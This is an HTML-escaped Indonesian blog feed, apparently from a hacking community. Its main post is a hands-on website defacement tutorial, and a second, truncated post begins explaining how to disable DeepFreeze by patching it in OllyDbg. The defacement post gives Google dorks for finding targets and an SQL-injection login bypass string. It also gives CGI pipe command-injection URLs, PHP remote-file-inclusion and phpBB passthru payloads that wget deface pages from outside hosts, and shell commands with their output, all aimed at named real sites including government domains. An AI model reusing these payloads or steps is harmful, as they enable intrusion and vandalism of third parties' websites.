lu&lt;br /&gt;&lt;br /&gt;trus ok Kalo mau pake musik pilih tab format diatas,&lt;br /&gt;&lt;br /&gt;trus pilih backgrounds trus pilih tab general,&lt;br /&gt;&lt;br /&gt;pada &amp;#8220;background sound location&amp;#8221; ketik&lt;br /&gt;&lt;br /&gt;http://www.indonesia.go.id/berkibar.mid atau cari file midi di pc lu&lt;br /&gt;&lt;br /&gt;trus ok Utk nyimpan nya pilih tab file diatas, pilih save as&amp;#8230;&lt;br /&gt;&lt;br /&gt;file name : Hacked atau nama nick kamu, trus ok&lt;br /&gt;&lt;br /&gt;Catatan : seandainya waktu lu nyimpan file ada keluar&lt;br /&gt;&lt;br /&gt;&amp;#8220;save embedded file&amp;#8221; pilih &amp;#8220;set action&amp;#8221; trus pilih &amp;#8220;dont save&amp;#8221; trus ok&lt;br /&gt;&lt;br /&gt;Utk meliat hasilnya pilih tab preview dibagian bawah.&lt;/p&gt;&lt;br /&gt;&lt;p&gt;=======================================&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;strong&gt;Deface guestbook (buku tamu)&lt;/strong&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Dengan menggunakan teknik SQL Injection,kita bisa mendeface guestbook&lt;br /&gt;&lt;br /&gt;(bukutamu) baik file php,asp,cfm,cgi,html dan kawan2. Ingat2 nggak&lt;br /&gt;&lt;br /&gt;semua guestbook  bisa dideface.&lt;br /&gt;&lt;br /&gt;Langkah2 nya&lt;/p&gt;&lt;br /&gt;&lt;p&gt;I. Cari target guestbook di www.google.co.id dgn mengetikkan&lt;br /&gt;&lt;br /&gt;site:my guestbook.php atau site:com bukutamu.php&lt;/p&gt;&lt;br /&gt;&lt;p&gt;II. Kalo udah dapat target nya, misalnya www.namatarget.my/guestbook.php&lt;br /&gt;&lt;br /&gt;maka yg perlu lu lakukan adalah mengisi kolom2 guestbook yg tersedia.&lt;br /&gt;&lt;br /&gt;Lu nggak perlu mengisi kolom guestbook nya dgn identitas asli,&lt;br /&gt;&lt;br /&gt;cukup identitas palsu aja.&lt;/p&gt;&lt;br /&gt;&lt;p&gt;contoh :&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Nama     : boneka lucu&lt;br /&gt;&lt;br /&gt;Email    : boneka_2005@yahoo.com&lt;br /&gt;&lt;br /&gt;Website  : www.boneka-lucu.com&lt;br /&gt;&lt;br /&gt;Asal     : toko boneka&lt;br /&gt;&lt;br /&gt;Komentar :&lt;br /&gt;&lt;br /&gt;&lt;img src="http://geocities.com/psychophysiological1981/scripts/3.bmp" /&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Perhatikan baik2 perintah yg ada di kolom komentar,dgn cara&lt;br /&gt;&lt;br /&gt;SQL Injection ke guestbook tsb, disitu kita akan memasukkan&lt;br /&gt;&lt;br /&gt;sebuah gambar (jgn gambar porno ya ? nggak boleh lho ?&lt;br /&gt;&lt;br /&gt;ntar dimarah mama). Trus klik tombol &amp;#8220;submit&amp;#8221; atau tombol apa&lt;br /&gt;&lt;br /&gt;namanya yg ada di guestbook tsb. Selanjutnya buka url/browsing baru trus&lt;br /&gt;&lt;br /&gt;ketik target tadi www.namatarget.my/guestbook.php&lt;br /&gt;&lt;br /&gt;Kalo hasilnya belum ada, coba klik tab &amp;#8220;refresh&amp;#8221; di samping url/browsing&lt;br /&gt;&lt;br /&gt;lu. Nah&amp;#8230;muncul deh gambar yg kita masukin tadi di guestbook tsb.&lt;br /&gt;&lt;br /&gt;Berarti guestbook tsb bisa dideface.&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Catatan :&lt;br /&gt;&lt;br /&gt;Kalo nggak ada gambarnya, yg ada hanya tulisan&lt;br /&gt;&lt;br /&gt;&lt;img src="http://geocities.com/psychophysiological1981/scripts/3.bmp" /&gt;&lt;br /&gt;&lt;br /&gt;berarti guestbook tsb nggak bisa dideface. Lu jgn kecewa dong !&lt;br /&gt;&lt;br /&gt;cari target yg lain.&lt;/p&gt;&lt;br /&gt;&lt;p&gt;III. Kalo udah muncul gambar yg kita masukkan tadi,&lt;br /&gt;&lt;br /&gt;buka lagi guesbook tsb. Trus isi lagi kolom2 guestbook yg tersedia.&lt;/p&gt;&lt;br /&gt;&lt;p&gt;contoh :&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Nama     : deface&lt;br /&gt;&lt;br /&gt;Email    : deface_2005@yahoo.com&lt;br /&gt;&lt;br /&gt;Website  : www.deface.com&lt;br /&gt;&lt;br /&gt;Asal     : dunia maya&lt;br /&gt;&lt;br /&gt;komentar :&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;&lt;img src="http://geocities.com/psychophysiological1981/scripts/1.bmp" /&gt;&lt;br /&gt;&lt;br /&gt;Perhatikan baik2 perintah yg ada di kolom komentar, dgn cara SQL Injection ke guestbook tsb, disitu kita akan memasukkan script utk deface.&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;Catatan :&lt;br /&gt;&lt;br /&gt;Sebelum lu memasukkan script diatas tadi, lu edit dulu kata2 nya sesuai&lt;br /&gt;&lt;br /&gt;keinginan lu.&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;IV. Klik tombol &amp;#8220;submit&amp;#8221; atau tombol apa namanya yg ada di guestbook tsb.&lt;br /&gt;&lt;br /&gt;Selanjutnya buka url/browsing baru trus ketik target tadi www.namatarget.my/guestbook.php&lt;br /&gt;&lt;br /&gt;Kalo hasilnya belum ada, coba klik tab &amp;#8220;refresh&amp;#8221; di samping url/browsing lu.&lt;br /&gt;&lt;br /&gt;Nah&amp;#8230;muncul deh hasil deface kita di guestbook tsb.&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;======================================&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;deface asp dgn sql injection&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;1. buka browsing/url www.google.co.id&lt;br /&gt;&lt;br /&gt;2. ketik site:go.id login.asp&lt;br /&gt;&lt;br /&gt;misal nya kita dapat target www.namatarget.com/login.asp&lt;br /&gt;&lt;br /&gt;3. username dan pass ketik &amp;#8216;or&amp;#8221;=&amp;#8217;&lt;br /&gt;&lt;br /&gt;4. buka satu persatu file yg ada disana&lt;br /&gt;&lt;br /&gt;5. cari file yg bisa kita ubah/deface&lt;br /&gt;&lt;br /&gt;6. buka browsing/url baru trus ketikkan target tadi misal nya www.namatarget.com&lt;br /&gt;&lt;br /&gt;7. kalo hasil nya belum ada, klik tab refresh disamping url lu&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;======================================&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;deface cgi&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html &lt;&lt;&lt; file aslinya&lt;br /&gt;&lt;br /&gt;tambahin |pwd| diujungnya&lt;br /&gt;&lt;br /&gt;|pwd| &lt;&lt;&lt; perintah/bug utk linux/unix&lt;br /&gt;&lt;br /&gt;https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html|pwd|&lt;br /&gt;&lt;br /&gt;yg keluar di web target adalah /home/sites/site52/users/wolfsecu/web/coartcds/Web_store&lt;br /&gt;&lt;br /&gt;ok......lanjut&lt;br /&gt;&lt;br /&gt;https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html|wget http://www.geocities.com/nusantarajaya_2004/arai.html -O /home/sites/site52/users/wolfsecu/web/jh.htm|&lt;br /&gt;&lt;br /&gt;kasih jarak 1 spasi wget dgn situs lu&lt;br /&gt;&lt;br /&gt;-O  &lt;&lt; ini huruf -O besar, bukan angka nol&lt;br /&gt;&lt;br /&gt;cara liat nya =&gt; https://bronte.netpresence.com.au/~wolfsecu/arai.html&lt;br /&gt;&lt;br /&gt;&amp;#8230;/home/sites/site52/users/wolfsecu/web/coartcds/Web_store  &lt;&lt;&lt; perhatikan baik2&lt;br /&gt;&lt;br /&gt;.../home/sites/site52/users/wolfsecu/web/jh.htm &lt;&lt;&lt; perhatikan baik2&lt;br /&gt;&lt;br /&gt;.../coartcds/Web_store &lt;&lt;&lt; musti dibuang&lt;br /&gt;&lt;br /&gt;cara cari target =&gt; allinurl&lt;img src='http://arai.web.id/v1.2/smilies/yahoo_kiss.gif' alt='&amp;#58;&amp;#42;' class='wp-smiley' width='18' height='18' title='&amp;#58;&amp;#42;' /&gt;.cgi * page:.*html+site:.us atau http://www.google.co.id/search?q=allinurl&lt;img src='http://arai.web.id/v1.2/smilies/yahoo_kiss.gif' alt='&amp;#58;&amp;#42;' class='wp-smiley' width='18' height='18' title='&amp;#58;&amp;#42;' /&gt;.cgi%3Fpage%3D*.html+site:.com&amp;#038;hl=id&amp;#038;lr=&amp;#038;start=10&amp;#038;sa=N&lt;br /&gt;&lt;br /&gt;target nya musti file html diujung nya kalo mau tambahin |pwd|&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;=======================================&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;deface cgi II&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|id|&lt;br /&gt;&lt;br /&gt;http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|pwd|&lt;br /&gt;&lt;br /&gt;http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|echo &amp;#8220;Hacked by psychophysiological. Hey admin&amp;#8230;do you a need help ? Matrix.Dal.Net - surabayahack&amp;#8221; &gt; /usr/home/web/users/a0004481/html/adspro/jh.html|&lt;br /&gt;&lt;br /&gt;http://www.sports-media.org/adspro/jh.html&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm &lt;&lt; file asli&lt;br /&gt;&lt;br /&gt;|id| &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; utk meliat user yg ada diserver tsb&lt;br /&gt;&lt;br /&gt;|pwd| &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; utk meliat file yg ada diserver tsb&lt;br /&gt;&lt;br /&gt;http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|pwd| &gt;&gt;&gt;&gt;&gt;&gt;&gt; usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro&lt;br /&gt;&lt;br /&gt;usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; perhatikan baik2&lt;br /&gt;&lt;br /&gt;usr/home/web/users/a0004481/html/adspro/jh.html &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; perhatikan baik2&lt;br /&gt;&lt;br /&gt;cgi-bin/adspro &lt;&lt;&lt;&lt;&lt;&lt;&lt; dibuang&lt;br /&gt;&lt;br /&gt;liat file index.html =&gt; http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|whereis%20index.html|&lt;br /&gt;&lt;br /&gt;http://www.enveracruz.com.mx/mercadito.cgi?page=../ventas.html|echo &amp;#8220;Hacked by psychophysiological. Hey admin&amp;#8230;do you a need help ? Matrix.Dal.Net - surabayahack&amp;#8221;&gt;decae.html|&amp;#038;cart_id=9721374.5730&lt;br /&gt;&lt;br /&gt;http://samedesign.us/cgi-bin/web_store.cgi?page=about.html|echo%20&lt;br /&gt;&lt;br /&gt;&lt;img src="http://geocities.com/psychophysiological1981/scripts/4.bmp" /&gt;&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;======================================&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;deface php dgn injection&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;http://dillon2.edumail.us/index.php?name=PNphpBB2&amp;#038;file=index&amp;#038;c=4&lt;br /&gt;&lt;br /&gt;itu file aslinya&lt;br /&gt;&lt;br /&gt;modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=&lt;br /&gt;&lt;br /&gt;itu bug nya&lt;br /&gt;&lt;br /&gt;http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/arai2.jpg?&lt;br /&gt;&lt;br /&gt;jadi index.php?name=PNphpBB2&amp;#038;file=index&amp;#038;c=4 dibuang&lt;br /&gt;&lt;br /&gt;cara inject nya http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/arai2.jpg?&lt;br /&gt;&lt;br /&gt;dikotak command unix masukin&lt;br /&gt;&lt;br /&gt;wget http://geocities.com/nusantarajaya_2004/arai.html&lt;br /&gt;&lt;br /&gt;cara liat nya http://dillon2.edumail.us/modules/PNphpBB2/includes/arai.html&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;http://www.narnia-chroniken.de &lt;&lt;&lt; halaman depan di deface&lt;br /&gt;&lt;br /&gt;http://www.narnia-chroniken.de/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/sandal_karet/script/arai2.jpg?&lt;br /&gt;&lt;br /&gt;ketik : pwd&lt;br /&gt;&lt;br /&gt;cd /homepages/7/d117874362/htdocs;wget file deface&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;========================================&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;deface php dgn injection II&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;http://www.giphted.com/index.php?siteName=pics%2Fom%2Findex.php&lt;br /&gt;&lt;br /&gt;itu file aslinya&lt;br /&gt;&lt;br /&gt;http://www.giphted.com/index.php?siteName=http://www.geocities.com/sandal_karet/script/arai2.jpg?&lt;br /&gt;&lt;br /&gt;dikotak masukin: pwd&lt;br /&gt;&lt;br /&gt;jadi pics%2Fom%2Findex.php dibuang&lt;br /&gt;&lt;br /&gt;cara inject nya http://www.giphted.com/index.php?siteName=http://www.geocities.com/sandal_karet/script/arai2.jpg?&lt;br /&gt;&lt;br /&gt;dikotak masukin: wget http://www.geocities.com/nusantarajaya_2004/arai.html -O /export/home/beangyy/www/arai.html&lt;br /&gt;&lt;br /&gt;cara liat nya http://www.giphted.com/arai.html&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;=========================================&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;deface phpbb/forum&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;http://www.bpmpt.go.id/forum/index.php&lt;br /&gt;&lt;br /&gt;itu file aslinya&lt;br /&gt;&lt;br /&gt;includes/db.php?phpbb_root_path=&lt;br /&gt;&lt;br /&gt;itu bug nya&lt;br /&gt;&lt;br /&gt;jadi index.php dibuang&lt;br /&gt;&lt;br /&gt;http://www.bpmpt.go.id/forum/includes/db.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/ara2.jpg?&lt;br /&gt;&lt;br /&gt;dikotak masukin: pwd&lt;br /&gt;&lt;br /&gt;Kalo keluar &amp;#8220;Hacking attempt&amp;#8221; artinya dipath&lt;br /&gt;&lt;br /&gt;Tapi kalo berhasil, terserah lu mau di apain&amp;#8230;&amp;#8230;&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;==========================================&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;deface phpbb/forum II&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12&lt;br /&gt;&lt;br /&gt;itu file aslinya&lt;br /&gt;&lt;br /&gt;&amp;#038;highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&amp;#038;a=id;pwd&lt;br /&gt;&lt;br /&gt;itu bug nya&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;cara inject nya http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12&amp;#038;highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&amp;#038;a=id;pwd&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;cara wget nya ada 3 cara :&lt;br /&gt;&lt;br /&gt;1.http://singapore.bluejackings.net/viewtopic.php?t=51&amp;#038;highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&amp;#038;a=wget%20http://geocities.com/nusantarajaya_2004/arai.html;ls&lt;br /&gt;&lt;br /&gt;2.http://singapore.bluejackings.net/viewtopic.php?t=51&amp;#038;highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&amp;#038;a=wget%20http://geocities.com/nusantarajaya_2004/arai.html -O /var/www/singapore/jh2.htm&lt;br /&gt;&lt;br /&gt;3.http://singapore.bluejackings.net/viewtopic.php?t=51&amp;#038;highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&amp;#038;a=lwp-download%20http://geocities.com/nusantarajaya_2004/arai.html;ls&lt;br /&gt;&lt;br /&gt;biasa nya cara ke 3 yg berhasil.&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;cara liat nya http://singapore.bluejackings.net/arai.html&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;=========================================&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;cara liat fs tanpa login&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;http://www.friendster.com/useropen.php?uid=&lt;br /&gt;&lt;br /&gt;&lt;&lt;&lt;&lt;&lt;&lt; masukin nomor id nya&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;===========================================&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;deface php dgn injection III&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;langsung di tembak aja bos biar ga lama2&lt;br /&gt;&lt;br /&gt;www.target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm?&lt;br /&gt;&lt;br /&gt;kolo berhasil seperti biasa&lt;br /&gt;&lt;br /&gt;cmd sql php injection&lt;br /&gt;&lt;br /&gt;buat nyari akses ke foldernya&lt;br /&gt;&lt;br /&gt;cmd =&gt; find / -perm 777 -type d&lt;br /&gt;&lt;br /&gt;klo foldernya permision denied berarti kita ga bisa apa2 di folder itu&lt;br /&gt;&lt;br /&gt;cari folder yg ga ada tulisan perm&lt;br /&gt;&lt;br /&gt;ambil contoh ini&lt;br /&gt;&lt;br /&gt;http://www.haddenhamonline.co.uk/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm?&lt;br /&gt;&lt;br /&gt;cari akses foldernya [commndnya diatas]&lt;br /&gt;&lt;br /&gt;cmd =&gt; find / -perm 777 -type d&lt;br /&gt;&lt;br /&gt;bakal makan B/w&lt;br /&gt;&lt;br /&gt;jd sabar aja&lt;br /&gt;&lt;br /&gt;=== contoh -perm denied ==&lt;br /&gt;&lt;br /&gt;find: /mnt/drive2/lost+found: Permission denied&lt;br /&gt;&lt;br /&gt;find: /proc/tty/driver: Permission denied&lt;br /&gt;&lt;br /&gt;find: /proc/1/task/1/fd: Permission denied&lt;br /&gt;&lt;br /&gt;itu artinya no akses&lt;br /&gt;&lt;br /&gt;kita cari yg lain&lt;br /&gt;&lt;br /&gt;tp usahakan foldernya yg /var/www/&lt;br /&gt;&lt;br /&gt;klo ga ada juga gpp&lt;br /&gt;&lt;br /&gt;ada yg lain&lt;br /&gt;&lt;br /&gt;/home/httpd/vhosts/hdca.org/httpdocs/downloads =&gt; contoh folder yg bisa&lt;br /&gt;&lt;br /&gt;cd /home/httpd/vhosts/hdca.org/httpdocs/downloads;[command dasar OSnya]&lt;br /&gt;&lt;br /&gt;[command dasar OSnya] =&gt; wget, dir, cat, rm, rv -rf dll&lt;br /&gt;&lt;br /&gt;skarang kita wget&lt;br /&gt;&lt;br /&gt;cd /home/httpd/vhosts/hdca.org/httpdocs/downloads;wget http://www.geocities.com/nusantarajaya_2004/arai.html&lt;br /&gt;&lt;br /&gt;coba lo masukin&lt;br /&gt;&lt;br /&gt;ke cmdnya&lt;br /&gt;&lt;br /&gt;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&lt;br /&gt;&lt;br /&gt;&amp;#8211;10:35:01&amp;#8211;  http://www.geocities.com/nusantarajaya_2004/arai.html&lt;br /&gt;&lt;br /&gt;=&gt; `arai.html&amp;#8217;&lt;br /&gt;&lt;br /&gt;Resolving www.geocities.com&amp;#8230; 66.218.77.68&lt;br /&gt;&lt;br /&gt;Connecting to www.geocities.com[66.218.77.68]:80&amp;#8230; connected.&lt;br /&gt;&lt;br /&gt;HTTP request sent, awaiting response&amp;#8230; 200 OK&lt;br /&gt;&lt;br /&gt;Length: 6,021 [text/html]&lt;br /&gt;&lt;br /&gt;0K &amp;#8230;..                                                 100%   98.21 KB/s&lt;br /&gt;&lt;br /&gt;10:35:02 (98.21 KB/s) - `arai.html&amp;#8217; saved [6,021/6,021]&lt;br /&gt;&lt;br /&gt;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&amp;#8212;&lt;br /&gt;&lt;br /&gt;itu artinya sukses ke save&lt;br /&gt;&lt;br /&gt;karena httpdocs&lt;br /&gt;&lt;br /&gt;gampang cara liatnya&lt;br /&gt;&lt;br /&gt;/home/httpd/vhosts/hdca.org/httpdocs/downloads =&gt; www.hdca.org/downloads/[file deface lo]&lt;br /&gt;&lt;br /&gt;contoh www.hdca.org/downloads/arai.html&lt;br /&gt;&lt;br /&gt;selsai deh&lt;br /&gt;&lt;br /&gt;gampang kan&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;http://www.zone-h.org/defaced/2005/08/06/www.estudioadobbato.com.ar/&lt;br /&gt;&lt;br /&gt;http://www.blogbugs.com/index.php?mod=articledetail&amp;#038;&amp;#038;aid=Nzk=&lt;br /&gt;&lt;br /&gt;http://www.tyg2004.de/index.php?page=http://www.geocities.com/jambihackerlinkcrew/sql.htm?&amp;#038;cmd=id;pwd&lt;br /&gt;&lt;br /&gt;http://img143.imageshack.us/img143/6782/hacked8lc.jpg&lt;br /&gt;&lt;br /&gt;http://www.sobatpadi.net/download/&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Courier New"&gt;http://www.sinjai.go.id/profil.php?kat=kelautan_perikanan&amp;#038;dir=http://www.geocities.com/dian_maulani2005/inject.htm?&amp;#038;cmd=id;pwd;ks%20-la&lt;br /&gt;&lt;br /&gt;http://www.infokomputer.com/aktual/aktual.php?id=Dian+Maulani &lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-4336081184723738648?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/4336081184723738648/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=4336081184723738648&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/4336081184723738648'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/4336081184723738648'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/01/langkah-langkah-deface.html' title='langkah-langkah deface'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-7209487360157444664</id><published>2008-01-31T01:12:00.000-08:00</published><updated>2008-06-29T04:05:29.012-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Computer'/><title type='text'>about deepfreeze</title><content type='html'>Penulis tidak bertanggung jawab akan kerusakan atau kerugian yang &lt;br /&gt;ditimbulkan akibat penggunaan ataupun &lt;br /&gt;pelaksanaan tutorial ini. Tutorial ditujukan untuk mereka yang mau &lt;br /&gt;belajar bukan untuk mereka yang ingin &lt;br /&gt;merusak bahkan merugikan orang lain dengan tindakannya.Anyway, Let's &lt;br /&gt;Get It on!!!! &lt;br /&gt;&lt;br /&gt;$&gt;DeepFreeze adalah salah satu Software yang digunakan untuk &lt;br /&gt;mengamankan, mencegah dan mengontrol komputer &lt;br /&gt;dari pengerusakan yang dilakukan sengaja ataupun tidak sengaja. &lt;br /&gt;Sesuai dengan namanya software ini akan "Membekukan" segala yang ada di &lt;br /&gt;partisi "beku"nya. &lt;br /&gt;Tidak ada "Restriction" dalam penggunaan komputer yang "dibekukan", &lt;br /&gt;hanya saja semua settingan, dan kondisi &lt;br /&gt;komputer akan kembali seperti semula setelah komputer di-restart / &lt;br /&gt;booting. &lt;br /&gt;$&gt;Tutorial ini akan membahas tentang cara Disable/Un-freeze DeepFreeze &lt;br /&gt;versi 4.20.020.0598, 4.20.120.0598, &lt;br /&gt;4.20.121.0613, 5.20.220.1125 dan 5.30.120.1181 pada OS Windows 2K/XP. &lt;br /&gt;&lt;br /&gt;$&gt;Pada umumnya DeepFreeze mempunyai aplikasi yang aktif di komputer &lt;br /&gt;yang masih "Enable", dan bila kita ingin &lt;br /&gt;mengubah setingan dari DeepFreeze maka harus masuk ke menu Config yang &lt;br /&gt;diproteksi oleh password tentunya. &lt;br /&gt;$&gt;Ada beberapa cara untuk men-Disable software ini, yaitu dengan &lt;br /&gt;menggunakan disket (bootable tentunya) &lt;br /&gt;lalu boot dari disket itu dan memindahkan file DFSERVEX.EXE yang berada &lt;br /&gt;di path c:\progra~1\hypert~1\deepfr~1 &lt;br /&gt;ke tempat lain. Dan yang terakhir yaitu dengan menggunakan Disassembler &lt;br /&gt;untuk mem-Patch File Frzstate(2K).exe. &lt;br /&gt;Tutorial ini akan membahas cara yang kedua. &lt;br /&gt;&lt;br /&gt;Tools yang diperlukan : &lt;br /&gt;1.Ollydbg 1.10 &gt; http://www.ollydbg.de/ &lt;br /&gt;2.Process Explorer &gt; http://www.sysinternals.com/ &lt;br /&gt;3.Ollyscript &gt; http://ollyscript.apsvans.com/ &lt;br /&gt;4.ASPack 2.12 OEP finder script by hacnho/VCT2k4 &gt; &lt;br /&gt;http://ollyscript.apsvans.com/ &lt;br /&gt;&lt;br /&gt;Langkah-langkah : &lt;br /&gt;1.Jalankan Process Explorer lalu lihat aplikasi Frzstate.exe atau &lt;br /&gt;Frzstate2k.exe yang berjalan lalu klik kanan &lt;br /&gt;untuk melihat propertiesnya. Catat Properties Command Linenya yang &lt;br /&gt;berisi path program itu dan 3 angka terakhir. &lt;br /&gt;contoh : C:\Program Files\HyperTechnologies\Deep &lt;br /&gt;Freeze\_$Df\FrzState.exe 1 1066917 0 &lt;&lt; 3 angka terakhir &lt;br /&gt;2.Jalankan Ollydbg 1.10 dan buka Aplikasi Frzstate(2k).exe melalui path &lt;br /&gt;yang sudah dicatat. Jangan lupa masukkan &lt;br /&gt;3 angka terakhir di kolom Arguments. &lt;br /&gt;3.Akan ada box peringatan yang muncul hiraukan saja, pada box &lt;br /&gt;peringatan kedua kilk No. &lt;br /&gt;4.Jalankan Plug-in OllyScript dengan memb-Browse-nya di menu &lt;br /&gt;Options&gt;Appearance&gt;Plugi-in Path &lt;br /&gt;5.Jalankan Script EOP di menu Plugins&gt;Run Script&gt;Ollyscript tentukan &lt;br /&gt;path dari EOP script lalu klik Open. &lt;br 